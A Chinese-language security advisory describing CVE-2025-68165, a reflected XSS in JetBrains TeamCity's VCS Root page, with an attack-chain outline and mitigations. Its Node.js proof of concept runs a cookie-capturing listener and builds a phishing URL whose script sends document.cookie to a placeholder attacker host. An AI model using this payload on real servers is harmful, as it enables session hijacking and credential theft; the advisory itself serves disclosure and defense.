CVE-2025-68165: JetBrains TeamCity 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-68165

漏洞类型

反射型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

JetBrains TeamCity

漏洞概述

CVE-2025-68165是JetBrains TeamCity中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞影响TeamCity 2025.11之前的版本，攻击者可以在VCS Root配置页面注入恶意脚本代码。反射型XSS攻击通过诱导用户点击特制的链接，利用服务器对用户输入的不当处理，将恶意脚本反射回用户浏览器执行。由于该漏洞不需要认证即可利用，攻击者可以构造钓鱼链接诱骗目标用户点击，从而窃取用户会话cookie、劫持用户账户或进行其他恶意操作。TeamCity作为一款广泛使用的持续集成和持续部署（CI/CD）服务器，通常承载着企业核心的开发流程和敏感信息，一旦被攻击可能导致严重的安全后果。漏洞于2025年12月16日被披露，发现者为JetBrains安全团队（[email protected]）。鉴于该漏洞的CVSS评分为5.4（中等严重程度），且利用难度较低，建议相关用户尽快升级到修复版本或采取临时缓解措施。

技术细节

该反射型XSS漏洞存在于JetBrains TeamCity的VCS Root设置功能中。漏洞的根本原因在于服务器端对用户提供的输入参数未进行充分的输入验证和输出编码。当用户在VCS Root配置页面提交数据时，某些参数会被直接回显到响应页面中，而服务器未能对特殊字符进行HTML实体编码处理。攻击者可以通过在VCS Root相关参数中注入JavaScript代码（如<script>alert('XSS')</script>或事件处理器onerror、onload等），构造恶意URL。由于该参数值被反射到HTTP响应中，用户的浏览器会将其解析为HTML/JavaScript代码并执行。攻击成功的关键条件包括：1）攻击者构造包含恶意脚本的URL；2）诱导目标用户点击该链接；3）用户浏览器执行反射的恶意代码。在TeamCity环境中，攻击者可能利用此漏洞获取管理员会话、访问项目配置、修改构建流程或提取敏感凭证信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标JetBrains TeamCity服务器版本，确认版本低于2025.11

STEP 2

步骤2

攻击者分析VCS Root配置页面的参数传递机制，找到反射点

STEP 3

步骤3

攻击者构造包含恶意JavaScript代码的URL，在VCS Root相关参数中注入XSS payload

STEP 4

步骤4

攻击者通过钓鱼邮件、社交工程或恶意网站诱导目标用户点击特制的链接

STEP 5

步骤5

目标用户点击链接后，浏览器向TeamCity服务器发送请求，服务器将未过滤的用户输入反射回响应

STEP 6

步骤6

用户浏览器解析响应内容时执行注入的恶意JavaScript代码，窃取会话cookie或执行其他恶意操作

STEP 7

步骤7

攻击者利用窃取的会话凭证劫持用户账户，访问敏感项目数据或修改构建配置

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-68165 PoC - Reflected XSS in JetBrains TeamCity VCS Root setup
// Target: JetBrains TeamCity < 2025.11

const http = require('http');

// Attacker's controlled server to capture cookies
const attackerServer = http.createServer((req, res) => {
  console.log('Received request from victim:', req.url);
  // Log the cookie or session info
  if (req.headers.cookie) {
    console.log('Cookie captured:', req.headers.cookie);
  }
  res.writeHead(200, {'Content-Type': 'image/gif'});
  res.end('GIF89a');
});

attackerServer.listen(4444, () => {
  console.log('Attacker server listening on port 4444');
});

// Malicious URL construction for TeamCity VCS Root XSS
// Replace TEAMCITY_URL with the target server
const teamcityUrl = 'http://TEAMCITY_URL:8111';
const maliciousScript = `<script>new Image().src='http://ATTACKER_IP:4444?c='+document.cookie;</script>`;
const encodedScript = encodeURIComponent(maliciousScript);

// VCS Root parameter injection
const xssPayload = `${teamcityUrl}/admin/admin.html?action=editVcsRoot&vcsRootId=test&name=test${encodedScript}`;

console.log('\n=== CVE-2025-68165 Reflected XSS PoC ===');
console.log('Malicious URL to send to victim:');
console.log(xssPayload);
console.log('\nIn a real attack, this URL would be disguised in a phishing email.');
console.log('When victim clicks the link, their cookies will be sent to attacker.');

// Alternative PoC - Direct script injection
const simplePayload = `${teamcityUrl}/admin/admin.html?action=editVcsRoot&vcsRootId=test&name=<img src=x onerror=alert(document.domain)>`;
console.log('\nSimple test payload:');
console.log(simplePayload);

影响范围

JetBrains TeamCity < 2025.11

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）限制TeamCity管理界面的网络访问，仅允许可信IP访问；2）通过反向代理添加XSS过滤规则；3）启用HttpOnly和Secure标志保护Cookie；4）提醒用户不要点击来源不明的链接；5）监控VCS Root相关页面的异常请求日志；6）考虑临时禁用非必要的VCS Root配置功能直到完成升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-68165
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-68165
3 Details https://www.cvedetails.com/cve/CVE-2025-68165/
4 VulDB https://vuldb.com/cve/CVE-2025-68165
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/